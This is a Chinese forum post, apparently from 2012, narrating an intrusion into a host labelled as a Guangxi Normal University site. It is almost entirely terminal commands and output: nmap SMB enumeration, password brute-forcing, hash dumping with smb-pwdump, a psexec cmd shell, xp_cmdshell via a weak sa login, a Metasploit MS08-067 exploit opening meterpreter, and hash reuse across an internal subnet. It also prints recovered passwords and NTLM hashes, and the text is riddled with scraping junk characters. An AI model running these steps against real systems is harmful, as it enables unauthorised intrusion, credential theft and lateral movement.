广西师范网站http://202.103.242.241/
& L' @9 E# i6 V* `3 ^6 _2 ?
$ y1 W: K4 j3 l% }- k0 c; E5 kroot@bt:~# nmap -sS -sV 202.103.242.241
* ]7 d2 @6 z8 t9 x
' J1 P v: H( N4 y7 lStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
# i: d5 E1 l# E7 ]6 i) g' K: S
& f: U- A# n0 k; s1 y- G: cNmap scan report for bogon (202.103.242.241)5 K+ d' H" l: k3 S# e
; W1 V! }2 x5 B; a0 Z
Host is up (0.00048s latency).2 K5 E5 @& }) `
& \$ [; I2 V+ ]- ANot shown: 993 closed ports% C2 Y" o4 O- w3 O$ b# k0 n
! {: l8 X9 g s1 h" X) U
PORT STATE SERVICE VERSION/ J, a! w0 k# H" \6 W: \
/ T+ {' j: \3 }8 T2 n, c8 n7 H
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)7 X6 ^; ]- a4 l Z3 R! K
7 a+ }0 _# P$ r4 ~' v139/tcp open netbios-ssn
- ]. ^' ~' K3 y( H" ^. q
+ g+ {3 ^9 V F5 Q' d+ i& |445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds$ p- A3 l5 i: K% c
7 ]; u9 ]6 j4 D) K9 ~: F
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
; y- T7 l! ~+ U' w. e& l7 T& b) t* |' ]4 |! ?0 k" A; I, |5 Q
1026/tcp open msrpc Microsoft Windows RPC5 x5 \" q Q6 b/ p
2 o5 @/ J1 _) _- E3 T# g4 f& B) K
3372/tcp open msdtc?6 D$ O4 q2 s. a2 @
4 v$ x" i& P# `/ o3389/tcp open ms-term-serv?
% n1 o, k- b0 [9 h! z7 D. b* a# J1 P4 E5 d
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
! B# m! v- X6 qSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
! d, q7 c) `* ?1 X+ ^# y) f0 M
" D' C# \5 C, ~4 d) gSF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
5 |: O1 H2 I: W, t) T
7 P; |% X3 I7 VSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)# r S9 x. ?+ O' S; |5 P
' F. c& M& ]# l8 g3 |( d0 aSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO. I9 I3 z% {3 N7 j
: f' T* k! H- K
SF:ptions,6,”hO\n\x000Z”);
2 A- {9 b5 ~! |' `8 D; B) F' b5 O
6 t; m7 x6 c y7 Q; L, ~1 X) R5 oMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
& _* Q+ y) K& j& j: @' E" y! A/ Y$ b0 G/ L" B% U
Service Info: OS: Windows
7 ^, v# Z& _" O* \9 u
6 t7 T# Q3 G+ W, V/ u) kService detection performed. Please report any incorrect results at http://nmap.org/submit/ .! T8 W; J( Q0 e9 b* v+ D. O
; q$ n5 D- j0 B* r9 iNmap done: 1 IP address (1 host up) scanned in 79.12 seconds/ h9 P8 x% G ? d/ l6 m
- S: ]6 A. b! Y( e
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本2 M w# J H+ f. \& m- p
! O! o) B/ K' T$ T-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse+ ~, c& S$ V! _3 x! X
. A' h5 p' E+ ?0 D7 I
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse' P3 I$ B4 c6 b* ^5 |
/ m' n# {& z( U6 e6 i B
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
9 U# |+ b1 t f. G, a9 c: b7 _0 y7 h' U
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse" M2 }( a: t9 S% g( m
! Y: k8 |5 [ T9 J: g; r' q
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse Y6 M8 o' e7 s) m- k- D$ L
# b% x' N6 {/ Q8 x
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse: k0 s5 W: i S; e
7 m% Q/ k- b* D& Y-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse) I6 r, R1 O5 Z+ o1 v# H g6 s+ z
8 `: D4 K( e [# H, s2 _1 w-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse; d. q% g6 u9 Q7 ~
& i, s/ @2 T0 [: h$ N
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
" E3 I9 a* w' k9 Y/ Y; X v, Q- h9 k w) F% ?( e. x7 M9 Y7 N0 t/ P
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
# i! l: X y3 ]4 Z
' n5 [. E2 m# E$ }# H$ C-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse! x' l8 a+ a" C4 J: ]
, h# i% j( `5 o* z
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
! F0 C2 ?5 b& }) J/ t3 b* P' v; p" j; F" I% g. u% R+ J) B2 S+ R
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse0 u* U6 j9 H) j! \, p/ @) F
; T( J L) C. F4 ?8 y9 S3 @- t-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
1 r Q1 J, ?- f; e
: D& A$ y* b6 I! F4 W. Y; ~-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
! \1 J6 v" k* e. X- A5 k( p1 r9 w$ d s
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
: D2 w' a' i, |- `+ ?/ ?" E* F7 Y
//此乃使用脚本扫描远程机器所存在的账户名
5 \0 w$ w0 W; R5 @
5 P6 h4 l5 W9 L5 n" sStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST& ?1 K1 N0 H9 P9 ]& c
% H% p; B1 }2 E3 N1 E L \
Nmap scan report for bogon (202.103.242.241)
n: s, q+ ^; D/ R
& {2 L7 F8 V+ g/ W9 [6 \% N, N% zHost is up (0.00038s latency).1 J( T1 y8 t y$ C
3 M1 B& q c6 F& C) `/ s) [Not shown: 993 closed ports+ c4 C( b# u) ^$ X) S7 Z
# K/ a( r4 V/ ]( q2 KPORT STATE SERVICE
# e# `1 V, P, j t" o) U7 }" [: B# }: e; J* m e1 c. E1 a) [8 a. h0 A
135/tcp open msrpc6 S3 E* ]$ k* }. R1 [8 I" H
: e# `$ h: y& p6 L# X R139/tcp open netbios-ssn
6 l0 Y7 f. a1 K3 D9 L9 C4 I% N6 e: Y) T1 J, |5 Q" Z5 z2 }
445/tcp open microsoft-ds7 W. Q; d7 e$ O6 O) q" |
+ s4 C5 W0 Y% X% E: R3 R1025/tcp open NFS-or-IIS
+ d) H! _$ k3 j
6 R) O2 Q h; ~! V2 j; }1 C# E1026/tcp open LSA-or-nterm
6 j" N1 b) C2 R) p% d3 F4 R0 v0 V- P. Z! U' _# U, o
3372/tcp open msdtc
" @, t7 S! I: u9 N' y L) x, ]) ~) z7 k" Z$ g
3389/tcp open ms-term-serv. U/ C, L5 f1 O1 _
, F# ]6 f; g: }, |, ?2 a( H1 lMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)( }0 z, p5 g" k5 ^
# b# m' u; _8 m" E9 I5 y- GHost script results: a$ @7 j- [, |% W5 @% i( x2 c9 ~
+ f' I0 _7 _6 w( K2 E( q! m1 w( i
| smb-enum-users:
8 [% U) n) P( u7 N" D! v' q: a) R
$ V/ a. f9 i- z|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
" W, f# P. J- S) T
: B: C0 M* \0 @9 INmap done: 1 IP address (1 host up) scanned in 1.09 seconds9 Y& Z1 s: A: m2 ?$ I
. j4 ]9 \& ?3 L% @6 T
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
% G8 ?: O; g" V- e' s/ G! w; S2 z& J8 a( ]4 h0 D, r8 z0 [
//查看共享; _8 ~3 W6 n1 e6 y! V4 O. ^3 D
% m$ W+ E% ~7 R) H& UStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST$ u9 \' u! f2 ~( S4 k
1 ^; p1 d+ ]; ~8 ~0 g* Z
Nmap scan report for bogon (202.103.242.241)
. _1 I# W# X/ @* Y
/ `$ T5 W0 e$ m/ B: rHost is up (0.00035s latency).
. V3 `) y/ l& f2 ]: p* S# O' K4 k
! q1 V# G) q0 q. G! ~: MNot shown: 993 closed ports1 x, M- U; n0 w- ?9 h% f, ~6 P, [' i
' d" I X$ g5 HPORT STATE SERVICE
4 Z$ l2 o% M! |' P5 ^; n9 Q" I6 z- e% K! T- H% f7 k6 f( |8 x$ L
135/tcp open msrpc
$ i7 J5 ]$ C0 d7 `
5 L S: F) A+ F/ V% h' B7 l8 f139/tcp open netbios-ssn
. ^' r& r/ {" e; `5 [
% T7 Y; B1 E9 O( W6 u445/tcp open microsoft-ds
a- c& p: L0 t* t# `' K7 v% V
7 e# h- s: J/ O" P5 @1025/tcp open NFS-or-IIS7 r/ ] }9 ~, \, Q/ ?
8 @+ R! q% s* H' d) Z! e
1026/tcp open LSA-or-nterm
2 O+ x8 p: b( y+ Q
|1 F% b+ J7 q9 _" }3372/tcp open msdtc/ j) `: G5 ?/ s& X4 Q6 w9 [
' S! H6 C2 c" t+ T$ v
3389/tcp open ms-term-serv( ^9 ~7 p6 {* g5 F' Y
2 q( s0 n i( I" u0 T
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
- r! @4 u/ H+ R2 k1 ?2 }+ m* x5 M+ A/ z$ V
Host script results:1 t0 Z: L6 w& S
$ i |+ ]: n6 ]& t6 s# K| smb-enum-shares:7 w1 n# z2 h4 n) y
/ H6 H; P6 p, Z3 l6 F$ l- K| ADMIN$+ }" {# V3 J6 s3 d. @0 k4 P: `
) x6 U, {$ l" c3 z- O| Anonymous access: <none>9 m% a7 m+ A7 {% x& E8 T
& t3 m6 R4 O4 E( ~' Z% a+ S| C$
: A' z) t6 J' _; K4 r; `: w/ W9 F+ W- V1 ]& [: d5 J& t+ p% Z4 v
| Anonymous access: <none># g9 P& r. Q+ H8 g# i
& P y% ? ~' X3 }3 F| IPC$
' C3 {$ I0 T5 v
, Z c+ {, w( R6 S0 Y|_ Anonymous access: READ- }. P- X. C k! |/ C4 g* |* t& s# I
8 N7 e) a/ K/ I- U
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds* `9 f+ v. }" j2 V' N+ [
/ z- u8 ~9 D5 l3 S: T7 ?# nroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
( S) J: F+ S: P T3 U5 ?3 z1 z7 w+ v5 p
//获取用户密码
+ k6 i' m- K) U R. w) E- N0 |) R4 s! a5 p
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
) H# ^8 ?3 x& {: u% Q& N' U1 t y$ ]6 `; i
Nmap scan report for bogon (202.103.242.2418)1 N& K' k: V; \; w: J
+ D1 L+ _4 ?7 i1 M0 d% h( r6 yHost is up (0.00041s latency).% l+ c0 j- f0 y: S, ?" l
& D+ X; k, H- o- o' j
Not shown: 993 closed ports
9 j8 f$ I/ k" u3 i4 G) a0 L7 r2 l3 ]; F7 c! [2 J
PORT STATE SERVICE, ~+ S' j0 o0 N' F8 l
1 l2 ?' p# R; E! Q& { l
135/tcp open msrpc" P8 y' x) k& s9 x. X/ {; X( O
' ~! p+ I( r$ ^: U0 c5 M8 C139/tcp open netbios-ssn' X' ^; K7 }$ i% K6 F
3 T& ?8 S1 `9 r2 A! V445/tcp open microsoft-ds
& X/ C" ]- W' A3 ^
4 c! {( J& I1 {0 N& x* N1025/tcp open NFS-or-IIS
$ L( w# c+ \) _+ ?3 J* {' f$ j. F% t3 R/ Z
1026/tcp open LSA-or-nterm
1 l$ I" V0 L6 r
[* b4 t' i: l" Y3372/tcp open msdtc
% U2 e, M% a' h# v! Q/ p0 w# Z/ K: I; |" o# I5 x0 V' y. ]9 m
3389/tcp open ms-term-serv1 g7 ^) E- V& `# g- M
7 A" i* S; A# `0 j# ~: i O, _8 W
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)+ f% M, L! X# ?: X
2 f6 f$ ?/ W/ |2 uHost script results: v0 k* d+ x, S" t1 G0 v
! j% l" F( i' U8 a5 a9 j( `| smb-brute:1 N+ T) m2 Z# Q# `& F+ R, }
) H. W% t# e! |0 q: b$ j
administrator:<blank> => Login was successful7 F$ \* {5 y+ Q% e0 }
" C4 n: A! u: e( v" }|_ test:123456 => Login was successful
( y" y' Q! ?+ N! n) ?! J* a' g5 u9 I
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
% p4 ^! F" {& Y, {3 G3 d6 A! D' f5 Z: Y9 p+ ~2 d. `* y
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash/ d$ P6 {8 _2 m! Q5 e
+ O$ w& Q ]% Vroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
$ Z A3 d Z- z6 y8 a( N. S- Z7 z. C8 t; t8 F$ }$ d
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
8 B8 R* x6 @0 s2 c
% J- f# q+ E; f! V& troot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
& e" @) b" D- k3 g/ {- F4 x" `' r! V1 O
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST0 O' \! z" z$ R' p
+ t0 J- f. X' c
Nmap scan report for bogon (202.103.242.241)- D3 W$ \& Y! r3 Q$ S1 f
5 S3 f$ Q. u7 n" K+ |Host is up (0.0012s latency).# V! \. u* h# Q% @" @; M
. i. {; c9 P' {- M- A7 K8 ]0 k- o4 ZPORT STATE SERVICE( G" `! m2 w) s& x, G
0 Z% b; N; K3 K- B* f# l
135/tcp open msrpc4 N3 m2 A: p3 w( [( q- C% A% g
|8 A$ w2 R. r& L' f
139/tcp open netbios-ssn
, N& k$ h& o0 I ?6 `/ O: U1 I I( d+ q% K$ [
445/tcp open microsoft-ds" U1 R" f3 T0 d0 N( P5 G
4 C% u# t' i1 g4 v+ ~+ e8 Z, W7 EMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
% b2 c7 [3 y0 C' v$ e2 z( }) V6 F3 n) m; q/ L' r+ K
Host script results:6 [2 x- {# c! h$ `
! E. P( g; g0 j Y6 \6 L| smb-pwdump:
$ z" q! ~; ]! z2 {- }+ ^1 W# |( Y; {. c- W6 ?& _; D5 \7 b
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************: N1 o7 B/ E& b. O4 ], e$ V
. @" U4 f7 V5 O" `6 N6 Z$ h
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
4 [8 B6 ^+ M8 W a& ^# f- K4 g5 M. d- }1 x
' U/ `$ |) _. T3 F: }( o1 Y| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4( e9 U) z0 Z0 q8 F2 Q
. {# n! L, V9 Y|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
: a5 s6 M* [$ I3 K+ r) `) J! {- `1 O3 @5 o: V& i
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds7 @ X$ U/ M! G8 j+ L
% A A8 I: q/ T }1 r
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell: g+ ?+ V9 q6 }0 E1 |- z% H
; ~ t8 @0 i/ F% q% a-p 123456 -e cmd.exe
" u J1 d/ }( O* r+ W+ ]6 {4 d( n4 a: H3 F5 R
PsExec v1.55 – Execute processes remotely$ b7 X: Y: h \& g5 Q; U
$ R7 Q! h2 `! i9 p# ICopyright (C) 2001-2004 Mark Russinovich' G3 {+ }. i! P2 S# ]
7 K. E @+ z: I% A2 H# z& F ~! SSysinternals – www.sysinternals.com
! Y! j2 S0 @1 {
9 y Z: ^9 h6 J- I# l" B2 iMicrosoft Windows 2000 [Version 5.00.2195]
# Q- q% x. r0 q' L$ O! T, p
$ p$ T3 A& ~5 O4 L/ J9 A$ M(C) 版权所有 1985-2000 Microsoft Corp.+ R4 V# g+ v/ E( c
+ A* d, T( ~7 E' U; h
C:\WINNT\system32>ipconfig4 Q* J) t7 o! C
/ q: I( c9 |9 o: e+ K4 MWindows 2000 IP Configuration. d9 ]& S+ o0 t% k4 R) ~7 K
8 k" z6 Q9 g% qEthernet adapter 本地连接:, Z) @3 K6 j l
% a c# ]' |3 E, i; tConnection-specific DNS Suffix . :
" R% R; z5 |) H: y. h& j) P' C, D5 Q0 ?4 t
IP Address. . . . . . . . . . . . : 202.103.242.2411 [5 z* ~! I% G/ C% n' Y* Q- t5 A
: d& a! g0 D$ v2 O0 l |4 {; A0 j% x ]Subnet Mask . . . . . . . . . . . : 255.255.255.0
* m! c- y1 x! H# f& d9 Q5 I
- c8 x0 U$ n; L: @. N/ m1 \Default Gateway . . . . . . . . . : 202.103.1.1
) u- w% C( l( k
4 m J0 ^1 ?5 J8 fC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
8 W! Y" M& u1 l( S3 U' q& O; _- V6 e+ X& U p( k( i% e
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞8 b" B1 q7 B+ [: [1 w
% `' l+ `) H( V. A& cStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
, n& a8 E2 B! u; I+ [+ Z7 r/ D0 @4 N! F$ ~# h% R1 J: g3 ?
Nmap scan report for bogon (202.103.242.241)
: n5 K1 Y, L: q8 o+ P
6 e" F& J% e3 t/ jHost is up (0.00046s latency).
+ y& p7 ?% g7 f/ [6 `4 p0 B2 T5 B, t C6 z
Not shown: 993 closed ports
; ` X: O# W% M" J( e. o! t+ ~
) [. j5 F8 l& r5 C) t# FPORT STATE SERVICE
0 m. o7 f4 D1 e" z% S0 \
2 D' ^3 R1 u5 }# c3 e! s135/tcp open msrpc1 n5 F& k e: C
% N, B, t% t) }9 H. E
139/tcp open netbios-ssn5 e9 n8 S! v4 i2 W
: i" T8 t; D0 P7 R* h
445/tcp open microsoft-ds [: H7 f8 k" N+ T9 l3 z
9 e: o) y0 u! f" @# @6 c; k2 T& ~1025/tcp open NFS-or-IIS- ^4 }* [; {$ A! U- a) }# w( _
. v, x# A) x3 d- N1026/tcp open LSA-or-nterm
" L% C. M/ H+ g- G$ p2 Y; C2 Z+ {$ G" ~) P# A1 |1 L2 V/ d1 n& ?
3372/tcp open msdtc7 {! g. G! i4 p5 n1 O+ i: f0 A
6 ~. b6 Z0 y0 W0 E1 J. S) b6 d0 a0 M
3389/tcp open ms-term-serv0 Y {1 P0 n+ B9 h
# `2 ^8 E& z2 _; i1 j6 r9 ?MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
" c4 v+ `9 r: B. W! _- ]' H$ W2 `. L* h$ Q5 F
Host script results:
" V p. v4 V' H3 R: p- N
+ D$ p5 k: b9 c9 j| smb-check-vulns:
& R/ y t$ C6 |$ `* g
( }6 a# y8 O" `|_ MS08-067: VULNERABLE: R/ ]# T2 u; h# x: p
6 f0 ?6 G# ~+ b5 `( T
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds a& t1 S: w& j+ q+ J+ t' h
6 E$ N- A7 V' _" s. ?1 [3 K8 |3 i
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出% ?5 {/ m- c4 v! K' M! H1 R
3 q0 v" C- \5 x/ M& b8 y3 d9 `
msf > search ms08
. ^( J ~2 b. w1 H# ^4 [4 G% L6 I; d" l$ b- W7 L& Y2 o3 z2 v
msf > use exploit/windows/smb/ms08_067_netapi
! Z, i8 r: `) i1 U. `! A
; i* W8 q+ p4 K- U7 r+ Y9 K, D! c# ~msf exploit(ms08_067_netapi) > show options3 n+ [) t9 p# ^8 w
w2 \7 o) G" f/ [$ z- hmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
& w: K6 s7 h( Q* `7 U# V. Y
5 t# M& r" t5 i: G* b. z- R) L* Y& |msf exploit(ms08_067_netapi) > show payloads. K# y4 H0 F, w+ h4 j8 M* D' s
8 _) x; b5 N% z3 Mmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp+ z' }: C. k8 w2 h1 ~
& Q/ O; T5 c9 c6 S' C d+ Xmsf exploit(ms08_067_netapi) > exploit
& I% s7 K' g; `( d8 i. ?! L
) p, v# ?2 O1 v) r0 y, n+ w& Dmeterpreter >
, z9 u2 M% F' T6 }' h
' c$ \, i$ {$ [1 gBackground session 2? [y/N] (ctrl+z)+ k; t( e9 ^2 J4 h5 o
( v0 D0 D; M Q1 W6 Y! n' [! lmsf exploit(ms08_067_netapi) > sessions -l# \1 @: X2 E$ u( i% d0 k
! q8 S, ?! d4 e! G0 k( Croot@bt:/usr/local/share/nmap/scripts# vim usernames.txt
: {/ r$ r" C) N* s; e8 D }$ I) G
- B' k, S0 d7 e G$ C; Qtest3 w4 F# }& a- G m( S1 l
% n2 c% W5 r- J3 L& yadministrator/ x" p, j E$ H/ E2 E
7 n- J7 z3 u! }, ?! `
root@bt:/usr/local/share/nmap/scripts# vim password.txt+ X( ~7 p2 j. Z+ e* s7 @
7 p! t. d+ |& L5 i
44EFCE164AB921CAAAD3B435B51404EE
! v- f! \4 t: ^4 _ E' ]8 N, I4 B/ ]7 W' r4 W" D2 r
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 6 ~- `* I4 [9 d
d i* w& ^# d
//利用用户名跟获取的hash尝试对整段内网进行登录, b& Z; i7 ?9 I2 P1 j- m5 N( v- T
9 |! B! i' D, u, g1 a
Nmap scan report for 192.168.1.1052 \+ i( B( Y% K% v# A' X A2 O" j
/ W1 {1 J! p6 XHost is up (0.00088s latency). e' o ~. X: e3 `+ u3 }
E7 q) P2 @0 W- FNot shown: 993 closed ports
6 ?/ b3 F" G# g/ I: e
2 y( i9 C3 B4 n0 d. A4 JPORT STATE SERVICE# o" j6 {- D! }' p' v9 A% G$ R! n
- F7 J" X" T7 B& m1 S2 }2 A135/tcp open msrpc
0 `, s+ ?# x: d/ P1 p: H& d% Q
& n; l: ]( h3 u1 U139/tcp open netbios-ssn& m! Y! l E2 X0 W" \
7 C1 y+ z5 q% W* ]$ g+ A. _
445/tcp open microsoft-ds
' Z7 J; \6 ]8 h6 ?2 @
G5 g8 P! l5 w1025/tcp open NFS-or-IIS7 k, }2 t" n0 v5 \5 M
8 n3 u, V$ T6 y3 }) k( k1026/tcp open LSA-or-nterm$ E: o; u) Z, N
5 j5 |4 `$ r2 A0 c* D) G9 H3372/tcp open msdtc
' ?) v, j$ H$ e- w
* `6 G# T$ ^" e3 l5 V3389/tcp open ms-term-serv# |; h% ~ @$ ~
4 b* F! O1 V( P* wMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems): F# d) \8 ` Y+ ] C
! w! M$ l0 Y8 E& n# C `- j* ^% bHost script results:
6 g/ _ B: f8 [* `( D
0 J, T/ X9 |3 B6 r8 v( K' f| smb-brute:
2 L1 A% A+ F4 z5 m+ G# w3 d; o( `9 \7 v9 h
|_ administrator:<blank> => Login was successful& _/ o/ I/ p- t2 ~* b- r3 \
5 C' |$ _, x3 C! F& d8 \2 F攻击成功,一个简单的msf+nmap攻击~~·. N9 n- \! e7 b
/ f- ~- v1 p" E: X3 a! M6 Z- ? |
发表于 2012-12-4 12:46:42
收藏
支持
反对